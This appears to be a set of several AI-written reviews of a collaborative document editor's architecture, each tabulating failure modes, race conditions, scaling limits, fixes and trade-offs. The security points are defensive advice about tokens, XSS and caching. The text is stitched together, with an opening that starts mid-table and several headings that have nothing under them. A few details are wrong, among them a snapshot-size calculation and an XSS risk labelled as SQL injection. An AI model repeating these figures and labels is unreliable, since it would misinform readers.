| Full HTML snapshots every 30s | Large writes, expensive replication, poor diffing, possible 30s recovery gaps depending on exact implementation | Snapshot every N ops or on idle, store with revision, compress; large snapshots can go to object storage with metadata in Postgres | Slightly more complex restore path |
| Ambiguous durability model | The spec says “write change to PostgreSQL” and also “save full HTML every 30s”; if snapshots are the only durable state, up to 30s of edits can vanish | Be explicit: durable op append on each accepted edit, snapshots only for recovery speed | More storage |
| Hot documents create hot rows/partitions | A single active doc overloads one DB row/table partition | Use in-memory doc actor + op log, not direct row mutation. For very large docs, consider block/subtree partitioning | Cross-block edits become more complex |
| Read replicas for active documents | Replica lag serves stale snapshots; reconnecting client may load old state then apply wrong ops | For active docs, use primary or revision-aware fetch+replay; use replicas only for history/search/analytics | Less read offload |
| Large snapshots worsen replica lag | Replication lag grows exactly when collaboration is busiest | Reduce snapshot size/frequency; offload snapshots to object storage | Recovery can be slower |
| Polling DB from every server | Thundering herd against Postgres | Move real-time propagation off the DB | Extra infra |
| Connection pool exhaustion | Many API servers + WS write paths exhaust DB connections | Separate HTTP from collab workers; use small pooled DB writer layer / async persistence | More architecture |
| Org-ID partitioning is skew-prone | One large organization becomes one hot shard; “hot org” or “hot doc in one org” still melts one partition | Shard by document ID (or virtual shards), not just org ID. Keep org as a query dimension, not primary shard key | Cross-org/tenant queries become harder |
| Horizontal API scale doesn’t help the primary DB | More app servers produce more writes against the same bottleneck | Treat collaboration as a stateful, sharded service, not just more stateless API boxes | Bigger redesign |
| Redis as shared session/cache layer | If Redis is single-node or has eviction, auth/presence/fanout can fail unpredictably | Use HA Redis; separate session/auth from ephemeral presence/pubsub; disable eviction for critical keys | Higher cost |
| Issue | Failure mode | Specific fix | Trade-offs |
|---|---|---|---|
| JWT in localStorage | Any XSS steals the token; rich-text editors have large XSS surface | Use short-lived access token in memory + HttpOnly Secure SameSite refresh cookie; strong CSP and Trusted Types | More auth complexity; cookie flows need CSRF consideration |
| 24-hour JWT lifetime | Stolen token remains valid a long time | Shorten access token TTL (e.g. 5–15 min), rotate refresh tokens, support revocation/session versioning | More refresh traffic |
| JWT + Redis “session cache” mixed model | Confusing source of truth; revocations may not apply immediately | Pick a clear model: short-lived JWT + server-side session/refresh is common | Slightly less stateless |
| Permissions can change while WS stays open | User removed from doc/org can keep editing until token expiry | On doc join, check authorization; also push revocation events and disconnect affected sockets | More auth checks / eventing |
| Token expiry during WebSocket session | Long-lived socket stays authenticated forever unless server re-checks | Require periodic reauth or close socket at token expiry and reconnect with fresh token | Some reconnect churn |
| CloudFront caches API responses for 5 minutes | Users see stale docs; worse, private doc responses may leak if cache key is wrong | Cache only static assets at CDN. Mark doc/auth APIs Cache-Control: no-store, private; never cache personalized document GETs unless extremely carefully keyed | Higher origin load |
| Cached auth/permission responses | User still sees access after revoke or gets stale 403 | Don’t CDN-cache auth-sensitive APIs | Same as above |
| Raw HTML in collaborative docs | Stored XSS, reflected XSS, token theft, account compromise | Use a structured doc model, sanitize pasted/imported HTML, sanitize render/export path | Sanitization costs CPU and may strip some content |
| Abuse / flooding | One client can spam edits and DoS server/DB | Rate-limit per user/document/IP; cap message size and frequency | Must avoid harming legitimate bulk paste/editing |
| Issue | Failure mode | Specific fix | Trade-offs |
|---|---|---|---|
| Node.js single event loop per server | Large snapshots, JSON parsing, or one hot room can stall all sockets on that instance | Isolate collaboration into its own service/processes; use worker threads for heavy tasks | More services / ops |
| WebSocket connection imbalance | Round-robin at connect time doesn’t reflect active room load; one server gets hot docs | Balance by document ownership, not just connection count | Needs routing layer |
| Memory growth from room state + send buffers | Many active docs and slow clients can OOM a node | Bounded room state, bounded send queues, room eviction, snapshot+replay | More complexity |
| Protocol incompatibility during deploys | New servers send op formats old clients can’t apply | Version your protocol and maintain a compatibility window | Slower rollout cleanup |
This does not solve the main problems:
Better approach: split into:
Helpful for:
Not helpful for:
Good for tenant isolation, bad for load balance if one org is huge. Collaboration hotspots are usually by document, not org.
A practical production design looks like this:
Client fetches document snapshot + revision
docRevision = 18427.Client opens WebSocket to collaboration service
subscribe(docId, fromRevision=18427).Collaboration owner is authoritative for that doc
Each accepted op is durably appended
Fanout comes from the op stream
Snapshots are periodic optimization
Security
If you don’t want a full redesign immediately, do these first:
If you want, I can also turn this into:
Below is a system‑level failure‑mode / race‑condition / scaling‑bottleneck map for the architecture you described, followed by a concrete mitigation (or redesign) for each item together with the main trade‑offs to consider.
I grouped the items by the logical layer they belong to, because many of the problems cascade from one layer to the next.
| # | Issue (Failure Mode / Race Condition) | Why it Happens / Impact | Mitigation / Solution | Trade‑offs |
|---|---|---|---|---|
| 1.1 | WebSocket connection loss (client disconnect, server crash, LB timeout) | Client stops receiving updates → stale view, possible data loss if local edits are not flushed. | • Use sticky sessions (source‑IP affinity) or a centralized WebSocket broker (e.g., Redis Pub/Sub, NATS, or a dedicated socket‑server cluster with a shared connection registry). <br>• Implement client‑side reconnection with exponential back‑off and message replay (store last N operations per document in Redis). | Sticky sessions limit load‑balancer flexibility; a broker adds extra hop and operational cost but gives true fan‑out and fail‑over. |
| 1.2 | Server‑side broadcast limited to “that server” | Changes made on Server A are not pushed to clients attached to Server B until the 2‑second poll. This creates visible latency spikes and can cause out‑of‑order delivery. | Replace polling with event‑driven publish/subscribe: every server publishes its change to a Redis channel (or Kafka topic) and all servers subscribe. The broadcast becomes instantaneous and ordering can be enforced per‑document. | Requires a reliable message broker and handling of broker failures; adds a small memory footprint for the channel. |
| 1.3 | Polling every 2 s on every API server | As the number of servers grows, the aggregate read load on PostgreSQL scales linearly. With 50 servers you have 25 RPS of full‑table scans (or at least index scans). This quickly saturates the primary or read replicas. | • Switch to logical replication or LISTEN/NOTIFY in PostgreSQL so that changes are pushed to listeners. <br>• Or use Change Data Capture (CDC) with Debezium/Kafka Connect to stream row‑level changes. | Requires extra infrastructure (Kafka, Debezium) but eliminates wasteful polling. LISTEN/NOTIFY works only for modest traffic; CDC scales better. |
| 1.4 | Last‑write‑wins (LWW) with client‑provided timestamps | Clock skew (malicious or mis‑configured client) can overwrite newer edits, leading to data loss. Also, concurrent edits to the same paragraph can be silently discarded. | • Move to operational transformation (OT) or conflict‑free replicated data type (CRDT) algorithms that resolve conflicts based on intent, not on timestamps. <br>• If LWW must stay, replace client timestamps with server‑generated monotonic sequence numbers (e.g., a per‑document incrementing counter stored in Redis). | OT/CRDT adds algorithmic complexity and higher CPU per edit; server‑generated sequence numbers require a fast, strongly consistent counter (Redis INCR is cheap). |
| 1.5 | Duplicate or out‑of‑order messages (network jitter, retries) | Client may apply the same edit twice or apply an older edit after a newer one, corrupting the document state. | • Make every edit idempotent (include a UUID; server deduplicates). <br>• Use per‑document version numbers; server rejects edits with a version ≤ current version. | Version check forces the client to keep the latest version, slightly increasing client state size. |
| 1.6 | WebSocket connection‑count limits (ulimit, OS socket limits) | A single API server can only hold a few tens of thousands of concurrent sockets before hitting OS limits, causing new connections to be refused. | • Scale out the socket layer (more servers) and raise OS limits (net.core.somaxconn, file‑descriptor ulimit). <br>• Use a gateway such as AWS API Gateway WebSocket or Cloudflare Workers that terminates the socket and forwards messages via HTTP/2 to backend workers. | Raising OS limits is cheap but requires proper monitoring; a managed gateway removes socket‑scale concerns but adds latency and cost. |
| 1.7 | Message size explosion (full HTML snapshot every 30 s) | If many users edit a large document, a 30‑second snapshot can be several MBs, overwhelming both DB write bandwidth and network. | • Store incremental diffs (e.g., Quill Delta, JSON‑Patch) instead of full snapshots. <br>• Keep the full snapshot only in a cold‑storage bucket (S3) and keep a rolling delta log in Redis/Postgres for fast recovery. | Diff generation adds CPU; you need a compaction job to periodically coalesce deltas into a new full snapshot. |
| 1.8 | Back‑pressure on the server (burst of edits) | A sudden spike (e.g., copy‑paste of a large block) can flood the Node.js event loop, leading to increased latency or dropped messages. | • Use write‑through queue (e.g., BullMQ backed by Redis) to serialize writes to Postgres. <br>• Apply rate‑limiting per user (tokens per second). | Queue introduces additional latency (few ms) but protects the event loop. Rate‑limiting may affect power users. |
| # | Issue | Why it Happens / Impact | Mitigation | Trade‑offs |
|---|---|---|---|---|
| 2.1 | Round‑robin LB without session affinity → a user’s WebSocket may be re‑routed mid‑session (if LB re‑balances). | The client loses its open socket and must reconnect; any in‑flight edits are lost. | Enable sticky sessions (source‑IP or cookie‑based) for WS endpoints, or use a layer‑7 router that forwards based on a “document‑id” hash. | Sticky sessions reduce true load‑balancing; hash‑based routing may unevenly distribute load if many users work on the same doc. |
| 2.2 | LB health‑check timeout (too aggressive) → servers are marked unhealthy while still processing edits. | Traffic shifts to fewer servers, causing overload and increased latency. | Tune health‑check interval and graceful shutdown (drain connections before marking down). | Longer health‑check periods mean slower detection of real failures. |
| 2.3 | Single point of failure for LB (no active‑active) | Entire service unavailable if LB crashes. | Deploy multiple LB instances behind a DNS‑based fail‑over (Route 53) or use a managed service (AWS ELB, Cloudflare Load Balancer). | Adds cost and DNS TTL considerations, but eliminates single point of failure. |
| # | Issue | Why it Happens / Impact | Mitigation | Trade‑offs |
|---|---|---|---|---|
| 3.1 | Write hotspot on a single primary (every edit hits the same row → high row‑level lock contention) | As concurrency grows, the primary becomes the bottleneck; latency spikes and occasional deadlocks. | • Use partitioned tables per‑organization (already planned) and shard by document‑id across multiple PostgreSQL clusters. <br>• Apply optimistic concurrency (version column) and batch multiple edits into a single UPDATE. | Partitioning adds complexity to queries and migrations; sharding across clusters requires a routing layer. |
| 3.2 | Replica lag (read replicas used for “read‑heavy” ops) | The 2‑second poll may read stale data, causing out‑of‑date broadcasts. | • Keep read‑writes on the primary for low‑latency change detection. <br>• If replicas are needed, reduce replication delay by using synchronous replication for the latest commit or using logical replication that streams WAL in near‑real‑time. | Synchronous replication reduces write throughput; logical replication adds operational overhead. |
| 3.3 | Transaction loss on crash (no durable write‑ahead log flush) | A server crash before the DB commit can cause lost edits. | Ensure PostgreSQL fsync is enabled and use synchronous_commit = on for critical tables. | Slight performance hit (extra fsync) but guarantees durability. |
| 3.4 | Schema migration while servers are running | In‑flight edits may violate new constraints, leading to errors and possible data loss. | Adopt zero‑downtime migration patterns (add new column, back‑fill, switch, then drop old). Use feature flags on the API to toggle between schema versions. | Requires careful coordination and testing. |
| 3.5 | Full‑snapshot storage bloat | Every 30 s snapshot creates a new row; after weeks the table can be terabytes. | • TTL / archival: move snapshots older than X days to S3 and delete from DB. <br>• Compaction job: merge deltas into a new snapshot and prune old deltas. | Archival adds retrieval latency for historic versions; compaction needs additional compute. |
| 3.6 | SQL injection via malformed client data | If client‑provided HTML is stored unchecked, could lead to XSS when rendered. | Sanitize/escape HTML on the server, store as text but render through a safe sanitizer (DOMPurify) on the client. | Slight CPU overhead; must keep sanitizer version in sync. |
| # | Issue | Why it Happens / Impact | Mitigation | Trade‑offs |
|---|---|---|---|---|
| 4.1 | Redis as a single point of failure (session cache, pub/sub) | If Redis crashes, session lookup fails → forced logout; pub/sub channel lost → real‑time updates stop. | Deploy Redis Cluster (sharding + replication) or use a managed service (AWS Elasticache with Multi‑AZ). Enable persistence (AOF/RDB) for session data. | Cluster adds complexity, cross‑slot pub/sub limitations (need to use a single hash slot or a separate channel per node). |
| 4.2 | Redis pub/sub message loss (no durability) | If a server restarts while a message is in transit, that edit is never broadcast. | Switch to Redis Streams (or Kafka) which persist messages and support consumer groups with ack/replay. | Streams require consumer offset management; higher memory usage. |
| 4.3 | Cache stampede on document load (many users request same doc, cache miss) | All servers hit PostgreSQL simultaneously, causing a spike. | Use request coalescing (single flight) or early‑expire with stale‑while‑revalidate pattern. | Slightly stale data may be served for a few seconds, but read load is drastically reduced. |
| 4.4 | JWT stored in localStorage | XSS can steal the token → session hijack. | Store JWT in httpOnly Secure SameSite=Lax cookies; optionally use short‑lived access token + refresh token flow. | Cookies are sent on every request (small overhead) and need CSRF protection (SameSite mitigates most). |
| 4.5 | CloudFront caching of API responses (5 min) | Real‑time API endpoints (e.g., “GET /documents/:id”) may return stale content, causing users to see outdated snapshots. | Disable caching for any endpoint that returns mutable data, or use Cache‑Control: no‑store. If static assets only, keep CDN. | Removes CDN benefit for those endpoints (but they are low‑traffic compared to WS). |
| 4.6 | Cache invalidation race (snapshot saved, but CDN still serves older version) | Users see an older snapshot for up to 5 min. | Invalidate the CDN object programmatically after each snapshot write (CloudFront invalidation API) or use versioned URLs (e.g., /doc/123?v=timestamp). | Invalidation cost (max 1000 per day free on AWS) and extra query‑string handling; versioned URLs are cheap and more deterministic. |
| # | Issue | Why it Happens / Impact | Mitigation | Trade‑offs |
|---|---|---|---|---|
| 5.1 | Long‑lived JWT (24 h) with no revocation | If a token is stolen, the attacker can act for a full day. | Switch to short‑lived access tokens (5‑15 min) plus a refresh token stored in httpOnly cookie. Implement token revocation list in Redis for immediate logout. | Requires refresh flow and extra Redis reads on each token refresh, but limits exposure. |
| 5.2 | No per‑document ACL enforcement (only org‑level) | Users from the same org could edit any document, violating fine‑grained permissions. | Embed document‑level ACL in the DB and enforce in the API before broadcasting changes. Cache ACL in Redis for fast lookup. | Slight extra DB/Redis read per edit; adds complexity to permission management UI. |
| 5.3 | JWT signed with symmetric key stored in code repo | If repo is leaked, anyone can forge tokens. | Use asymmetric RSA/ECDSA keys with the private key only on the auth service; rotate keys regularly. | Slightly larger token size, verification cost is higher but still negligible. |
| # | Issue | Why it Happens / Impact | Mitigation | Trade‑offs |
|---|---|---|---|---|
| 6.1 | Network partition between API servers and DB | Some servers cannot write/read → local edits are lost or become inconsistent. | Deploy DB in a multi‑AZ cluster with automatic failover (Patroni, CloudSQL). Use circuit‑breaker pattern in the API to fallback to a “read‑only” mode and alert users. | Failover may cause brief write pause; circuit‑breaker adds latency when open. |
| 6.2 | NTP clock skew between clients (used for LWW) | A fast client can “win” over correct edits. | Do not trust client timestamps; generate server‑side timestamps or monotonic counters. | Removes ability for client‑side offline editing (if you need offline, you must sync and resolve later). |
| 6.3 | WebSocket payload size limits (e.g., CloudFront or ALB limits) | Large diff messages may be truncated, causing loss of edits. | Enforce max payload size on the client (e.g., 64 KB) and chunk larger changes into multiple messages. | Slightly more complex client logic. |
| 6.4 | DNS TTL mismatch for load‑balancer changes | When you add/remove API servers, clients may keep connecting to old IPs. | Keep low TTL (30 s) for the service DNS and use Service Discovery (Consul, AWS Cloud Map) for the WebSocket endpoint. | More frequent DNS queries; must ensure DNS provider supports low TTL. |
| # | Issue | Why it Happens / Impact | Mitigation | Trade‑offs |
|---|---|---|---|---|
| 7.1 | No visibility into edit latency | You cannot detect when the 2 s polling becomes a bottleneck. | Instrument end‑to‑end latency (client → WS → DB → broadcast) with OpenTelemetry; expose alerts on > 200 ms latency. | Minor instrumentation overhead, but huge operational benefit. |
| 7.2 | No back‑pressure metrics (queue depth) | Queue overflows silently, dropping edits. | Export BullMQ queue metrics (waiting, active, completed) to Prometheus; set alerts when waiting > N. | Requires monitoring stack. |
| 7.3 | No audit log of document changes | Hard to recover from accidental overwrite. | Write append‑only audit table (or event store) with user‑id, operation, timestamp. Use partitioning to keep it performant. | Extra storage cost; can be pruned after compliance period. |
| Refactor | What it solves | Rough effort & cost |
|---|---|---|
| Replace polling + LWW with event‑driven publish/subscribe + OT/CRDT | Eliminates latency spikes, removes race conditions, provides true collaborative semantics. | Medium‑high: need to integrate OT/CRDT library, add message broker, adjust client model. |
| Move WebSocket fan‑out to a central broker (Redis Streams / NATS / Kafka) | Guarantees delivery to all servers, removes need for polling, scales linearly with users. | Medium: set up broker cluster, update servers to subscribe/publish. |
| Use server‑generated monotonic version numbers (or sequence) instead of client timestamps | Removes clock‑skew attacks and data loss from LWW. | Low: add a column, generate via Redis INCR or DB sequence. |
| Introduce short‑lived JWT + refresh token + revocation list | Improves security, limits impact of stolen tokens. | Low‑medium: change auth flow, add token refresh endpoint. |
| Shard documents across multiple PostgreSQL clusters (by org‑id) | Breaks write hotspot, improves write scalability. | High: DB provisioning, routing layer, migration scripts. |
| Persist change logs in an event store (Kafka) and generate snapshots lazily | Reduces DB write volume, enables easy replay, supports offline edits. | Medium: set up Kafka, write consumer for snapshot generation. |
| Add graceful shutdown & connection draining on API servers | Prevents abrupt loss of in‑flight edits during scaling or deployment. | Low: handle SIGTERM, stop accepting new WS, wait for active edits to finish. |
Implementing these mitigations in the order of impact vs. effort (start with the low‑effort fixes: server‑generated version numbers, sticky sessions, JWT revocation, health‑check tuning) and then move to the higher‑effort architectural changes (event‑driven propagation, OT/CRDT, sharding) will give you a robust, horizontally‑scalable collaborative editor that can handle real‑world traffic spikes without data loss or user‑visible conflicts.
Below is a “code‑review” of the design you posted.
I’ve broken it down into failure modes / race conditions / bottlenecks and for each one I provide a concrete fix (or set of fixes) together with the main trade‑offs you’ll pay for it.
TL;DR – The biggest problems are:
- No distributed change bus – polling + per‑server broadcast is slow, inconsistent and scales poorly.
- Client‑clock based LWW – you’ll lose edits when clocks drift or when two users edit the same paragraph.
- Write‑heavy DB – one write per keystroke + a 30 s snapshot blows up PostgreSQL.
- Sticky‑session oblivious load balancer – round‑robin can route the same user to two servers, breaking the real‑time flow.
- Security & freshness holes – JWT in localStorage + CDN caching of API responses can serve stale data or be stolen.
Below are the detailed points.
| Problem | Why it fails | Fix | Trade‑offs |
|---|---|---|---|
| Per‑server broadcast + 2 s polling | • Latency (2 s) before other servers see a change. <br>• Inconsistent state when two servers write different changes to the same paragraph. <br>• Polling is wasteful – DB load grows linearly with #servers. | Introduce a distributed event bus (Redis Pub/Sub, NATS, Kafka, or a custom WebSocket “hub” cluster).<br>• Backend servers publish change events to the bus.<br>• Every server subscribes and pushes the change to its local clients immediately. | • Extra component to maintain (ops, monitoring). <br>• Slightly higher latency than direct WebSocket, but bounded to a few ms. <br>• Requires idempotency handling if you use a queue that can replay messages. |
| Clients reconnect to a different server | The new server won’t have the “in‑flight” changes that were already broadcast by the old server. | Sticky sessions (session affinity) on the load balancer or client‑side reconnection logic that re‑joins the same server (e.g. via a token that encodes the server ID). | • Sticky sessions hurt horizontal scaling of the backend (one server can become a hotspot). <br>• Client reconnection logic is more complex but keeps the backend stateless. |
| Duplicate change delivery | If both polling and Pub/Sub are used, a change may be broadcast twice. | Single source of truth – remove polling entirely. | • All servers must keep a local cache of the last change ID to avoid re‑processing. |
| Network partition | If the bus goes down, changes stop propagating. | Graceful degradation – keep local change log and replay when bus recovers. | • Adds a bit of complexity; you need a durable queue. |
| Problem | Why it fails | Fix | Trade‑offs |
|---|---|---|---|
| Last‑write‑wins based on client timestamps | • Client clocks can drift by seconds → edits from a “behind” client win.<br>• Two users editing the same paragraph simultaneously causes one edit to be silently dropped. | Operational Transformation (OT) or Conflict‑free Replicated Data Types (CRDT). <br>• Server assigns a monotonically increasing sequence number or uses a Lamport timestamp. <br>• Clients send operations (insert/delete) that can be merged deterministically. | • OT/CRDT libraries are non‑trivial to integrate and test. <br>• Larger message size (operation payload) but far more robust. |
| Optimistic concurrency control on the DB | Two writes to the same row can interleave. | Use PostgreSQL’s SELECT ... FOR UPDATE or INSERT … ON CONFLICT … UPDATE with a version column. | • Adds a small locking overhead but protects against lost updates. |
| Polling + 2 s delay | Users see a lag when another user edits the same paragraph. | Use the event bus (above) + OT/CRDT so updates are applied instantly. | • Real‑time feel improves dramatically. |
| Problem | Why it fails | Fix | Trade‑offs |
|---|---|---|---|
| One write per keystroke | 10+ users → 10k writes/sec for a single doc. PostgreSQL can’t keep up without sharding or batching. | Batch changes: buffer changes for 100–200 ms or 10 changes, then persist as a single row. <br>• Store a delta log (operation + target position). <br>• Snapshot every 30 s only if the document is actually dirty. | • Slightly more latency for the “last” change. <br>• Need to handle rollback if the batch fails (transaction). |
| Full HTML snapshot every 30 s | 30 s * 1 KB (doc) = 30 KB per doc per minute; for 10k docs that’s ~300 MB/min. | Store diffs instead of full snapshots. <br>• Use a binary diff algorithm (e.g. diff-match-patch). <br>• Keep snapshots only for critical points (e.g. every 5 min, every 1 MB of changes). | • Slightly more CPU to compute diffs. <br>• Recovery becomes a bit more complex (apply diffs to base). |
| Single PostgreSQL instance | All writes go to one node → CPU, I/O, and connection limits. | Write‑throughput sharding: partition by document ID or org ID into multiple Postgres instances (or use a sharded cluster like Citus). <br>• Use a “write‑hot” partition for the active doc. <br>• Keep a global read replica for analytics. | • More operational overhead (multiple DBs). <br>• Must implement routing logic in the API. |
| Connection pooling | Each write opens a new DB connection. | Use a connection pool (pg‑pool). | • Standard practice; no extra cost. |
| Problem | Why it fails | Fix | Trade‑offs |
|---|---|---|---|
| Round‑robin without session stickiness | User’s WebSocket may be routed to Server A, but a subsequent request (e.g. HTTP API) goes to Server B, which doesn’t know the user’s state. | Sticky sessions on the load balancer (IP hash or session cookie). | • Reduces cross‑server state but can create a single point of failure. |
| No graceful failover | If a server dies, its clients lose the socket and all in‑flight edits. | Implement reconnection logic that re‑joins the same document and re‑plays any missed changes from the event bus. | • Slightly more client logic. |
| Scaling the event bus | If you use Redis Pub/Sub, Redis single‑node becomes a bottleneck. | Use Redis Cluster or Kafka (with multiple partitions per topic). | • More infrastructure but scales horizontally. |
| Problem | Why it fails | Fix | Trade‑offs |
|---|---|---|---|
| JWT in localStorage | Vulnerable to XSS; stolen token can be used to hijack a session. | Store JWT in HttpOnly, SameSite=Lax/Strict cookie. <br>• Optionally rotate tokens or use short‑lived access tokens + refresh token in secure cookie. | • Requires CSRF protection (same‑site cookie). <br>• Slightly more round‑trips for token refresh. |
| 24‑hour expiry | User may be logged out mid‑session. | Use refresh token flow with a 14‑day refresh token + 15‑minute access token. | • Adds refresh logic. |
| CDN caching API responses | End‑points that return document data could be cached for 5 min → stale content. | Mark real‑time API routes with Cache-Control: no-store or a very short TTL. | • Nothing extra; just set headers. |
| Missing rate limiting | Attackers can flood a document with edits. | Apply per‑user / per‑doc rate limits (e.g., 10 ops/sec). | • Adds overhead but protects the system. |
| Problem | Why it fails | Fix | Trade‑offs |
|---|---|---|---|
| No metrics | Hard to spot hot documents or slow DB writes. | Instrument WebSocket ops, DB latency, queue lag, Redis latency. Use Prometheus + Grafana. | • Extra instrumentation code. |
| No alerting | You’ll only notice after a user reports. | Alert on high error rate, queue lag, DB connection exhaustion. | • Requires ops involvement. |
| No graceful degradation | If Redis or Pub/Sub goes down, all clients lose updates. | Keep a local in‑memory buffer and replay when the bus comes back. | • Slightly more code. |
| No transaction retries | DB write fails due to transient lock. | Use retry‑on‑deadlock logic in the API. | • Adds complexity but increases reliability. |
| Bottleneck | Fix | Trade‑offs |
|---|---|---|
| Per‑doc snapshot every 30 s | Store incremental diffs; only snapshot on major version or manually. | CPU for diff, complexity for replay. |
| Client‑clock based timestamps | Server‑issued operation IDs + Lamport timestamps. | Minimal extra data per message. |
| Polling + 2 s | Switch to LISTEN/NOTIFY in Postgres or logical replication to push changes. | Requires a small change‑push service; eliminates polling overhead. |
| High write contention on a single row | Use row‑level locking or CRDT that merges locally; push to DB only after a batch. | Latency for final persistence, but throughput increases. |
| Static assets being served by CDN | Good practice; no change needed. | Ensure API endpoints are excluded from CDN caching. |
| Layer | Recommendation | Reason |
|---|---|---|
| Event bus | Redis Cluster (Pub/Sub) or NATS | Fast, low‑latency, supports horizontal scaling. |
| Conflict resolution | CRDT library (e.g. Automerge, Yjs) | Already battle‑tested for collaborative editors. |
| DB | Citus (Postgres sharding) or partitioned Postgres | Keeps single‑node simplicity for small orgs, scales for large. |
| Auth | HttpOnly refresh token + short‑lived access token | XSS safe, still supports SPA. |
| WebSocket | Sticky session or client‑side reconnection to same server | Guarantees continuity. |
| Metrics | Prometheus + Grafana | Visibility into latency, error rates. |
Cache-Control: no-store – avoid stale CDN data.The current design is a classic “single‑box” real‑time editor that works for a handful of users but will break under real‑world load because it:
By replacing polling with a proper event bus, adopting a proven CRDT/OT engine, batching writes, and hardening auth/session handling, you’ll get a system that scales to thousands of simultaneous collaborators while maintaining strong consistency and resilience.
Below is a comprehensive analysis of the provided architecture for the real-time collaborative document editor. I'll break it down into three main categories: failure modes, race conditions, and scaling bottlenecks. For each identified issue, I'll describe the problem in detail, propose a specific solution, and discuss the trade-offs involved.
This analysis is based on the system's design, including the frontend, backend, database, real-time handling, sync strategy, storage, authentication, and scaling plan. I've considered potential points of failure, timing-dependent behaviors, and limitations under load.
Failure modes are scenarios where components of the system fail, leading to downtime, data loss, or incorrect behavior. These can arise from hardware failures, network issues, or software bugs.
Issue 1: API Server Failure (e.g., a Node.js server crashes or becomes unreachable).
Issue 2: Database Failure (e.g., PostgreSQL goes down or experiences high latency).
Issue 3: Redis Failure (e.g., session cache is lost due to server crash or eviction).
Issue 4: WebSocket Connection Instability (e.g., network issues or client-side problems).
Issue 5: CDN Caching Invalidation (e.g., CloudFront serves stale API responses).
Issue 6: Authentication Failures (e.g., JWT token expiry or security vulnerabilities).
Race conditions occur when the outcome depends on the timing or sequence of events, leading to inconsistencies or data corruption.
Issue 1: Inaccurate Conflict Resolution Due to Client Clock Skew.
Issue 2: Delayed Propagation of Changes Across Servers.
Issue 3: Concurrent Edits on the Same Document.
Issue 4: Snapshot Overwrite During Frequent Edits.
Scaling bottlenecks are limitations that hinder the system's ability to handle increased load, such as more users or documents.
Issue 1: High Database Write Load from Frequent Changes.
Issue 2: Inefficient Polling for Changes.
Issue 3: Uneven Load Distribution with Round-Robin Load Balancing.
Issue 4: Partitioning Limitations for Large Organizations.
In summary, this architecture has solid foundations but needs enhancements for real-time consistency, resilience, and scalability. Addressing these issues will require balancing trade-offs like added complexity versus improved reliability. I recommend prioritizing solutions based on your expected traffic and failure tolerance (e.g., start with pub/sub for race conditions). If you'd like, I can help refine a prioritized implementation plan.
Let’s analyze the architecture of this real-time collaborative document editor for potential failure modes, race conditions, and scaling bottlenecks. I’ll identify the issues, explain their implications, and propose specific solutions along with their trade-offs. The issues are categorized based on the components and strategies in the system.
SELECT FOR UPDATE) or optimistic concurrency control with version numbers for documents. Each update checks the version before committing.
| Issue | Impact | Solution | Trade-offs |
|---|---|---|---|
| WebSocket Connection Failures | User disconnection | Redis Pub/Sub for connection management | Complexity, latency |
| Client Clock Timestamp Issues | Data loss in conflicts | Server-side or vector clocks | Complexity, storage overhead |
| PostgreSQL Write Contention | Slow writes, bottlenecks | Batching, sharding | Latency, query complexity |
| Polling Overhead | Database load | Pub/Sub (Redis, Kafka) | Additional infrastructure |
| CDN Stale Data | Outdated responses | Short TTL or disable caching | Increased server load |
| Lack of OT/CRDT | Poor conflict resolution | Implement OT or CRDT | High implementation complexity |
This analysis highlights critical areas for improvement in fault tolerance, consistency, and scalability. Addressing these issues will make the system more robust for real-time collaboration at scale, though each solution introduces trade-offs that must be evaluated based on the project’s priorities (e.g., cost, performance, or simplicity).
Below, I'll systematically identify potential failure modes, race conditions, and scaling bottlenecks in the described architecture for a real-time collaborative document editor. I've categorized them for clarity, drawing from the system overview, data flow, and scaling plan you provided. For each issue, I've proposed a specific, actionable solution along with its trade-offs (e.g., benefits, drawbacks, complexity, and performance impacts). These are based on common pitfalls in distributed real-time systems like this one, which relies on WebSockets, polling, and a central database.
I've aimed to be comprehensive but focused on the most critical issues directly tied to the architecture. Note that some issues overlap categories (e.g., a race condition could lead to a failure mode), but I've grouped them logically.
These are scenarios where parts of the system could fail, leading to data loss, downtime, or inconsistent behavior.
Issue: PostgreSQL as a single point of failure. All changes are written to and polled from PostgreSQL. If the primary PostgreSQL instance fails (e.g., due to hardware issues, overload, or network partition), document updates stop propagating, servers can't sync, and the system becomes read-only or unresponsive. Read replicas help with reads but not writes.
Issue: API server failure disrupts WebSocket connections. Each server manages its own WebSocket clients. If a server crashes or is taken offline (e.g., for maintenance), connected clients lose their real-time updates, and changes they send aren't broadcast or persisted until reconnection (potentially to a different server via the load balancer).
Issue: Redis session cache failure leads to authentication issues. If Redis goes down, session data (e.g., active user sessions) is lost, forcing users to re-authenticate and potentially disrupting real-time collaboration mid-session.
Issue: Full HTML snapshots every 30 seconds risk data loss on crashes. If a server crashes between snapshots, any unsaved changes (up to 30 seconds' worth) are lost, as changes are only written to PostgreSQL per-event but snapshots are the "full" persisted state.
Issue: JWT tokens in localStorage are vulnerable to XSS attacks or token expiry mid-session. A 24-hour expiry means tokens can expire during long editing sessions, interrupting workflow. LocalStorage also exposes tokens to client-side attacks.
Issue: CDN caching of API responses causes stale data in real-time scenarios. CloudFront caches API responses for 5 minutes, but real-time document changes could make cached responses outdated, leading to users seeing inconsistent document states.
These involve timing issues where concurrent operations lead to inconsistent or lost data.
Issue: Client-side timestamps for last-write-wins conflict resolution are unreliable. Client clocks can be desynchronized (e.g., due to time zones, drift, or manipulation), causing incorrect "wins" in conflicts. For example, if two users edit the same paragraph simultaneously, a user with a slightly advanced clock could overwrite valid changes indefinitely.
Issue: Polling delay (every 2 seconds) causes inconsistent views across servers. Users on different servers might see divergent document states for up to 2 seconds (or more under load), leading to races where one user overwrites another's changes before they're visible.
Issue: Concurrent writes to PostgreSQL without proper locking. If multiple servers attempt to write conflicting changes to the same document row simultaneously (e.g., during a poll-sync), it could result in lost updates or corruption, especially without transactions or locks.
These are limitations that hinder performance as users/documents grow.
Issue: Polling PostgreSQL every 2 seconds from each API server creates a read bottleneck. With horizontal scaling (more servers), the database faces exponentially more poll queries, leading to high CPU/load and potential throttling.
Issue: Write-heavy PostgreSQL operations for every change. Every WebSocket event writes to PostgreSQL, which could bottleneck on IOPS/write throughput as user count grows, especially without sharding beyond org ID partitioning.
Issue: Per-server WebSocket connections limit horizontal scaling. Each Node.js server has finite resources (e.g., memory/file descriptors) for WebSockets. As users grow, servers could hit connection limits, and load balancing doesn't distribute WebSockets evenly.
Issue: Full HTML snapshots bloat storage and slow operations for large documents. Saving entire documents every 30 seconds consumes storage and I/O, especially for large or frequently edited docs, limiting scalability.
Issue: Uneven partitioning by organization ID leads to hotspots. If some organizations have disproportionately active documents, their partitions overload while others idle, bottlenecking the database.
